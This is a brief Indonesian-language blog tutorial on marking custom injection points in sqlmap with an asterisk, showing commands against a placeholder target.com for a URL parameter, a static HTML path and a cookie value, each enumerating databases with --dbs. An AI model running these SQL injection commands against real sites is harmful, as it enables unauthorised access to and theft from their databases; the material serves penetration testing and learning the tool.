Menentukan Inject Point pada SQLmap

Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.

Misalnya begini:

https://target.com/article.php?page=2&id=5

Dan inject pointnya ada di parameter id.  Maka perintahnya

sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs

Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di

https://target.com/article-315'-abcde.html

Maka di sqlmap perintahnya

sqlmap -u "https://target.com/article-315*-abcde.html" --dbs

Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya

sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"
  • referensi : https://miloserdov.org/?p=879
Shares

One Response

Leave a Reply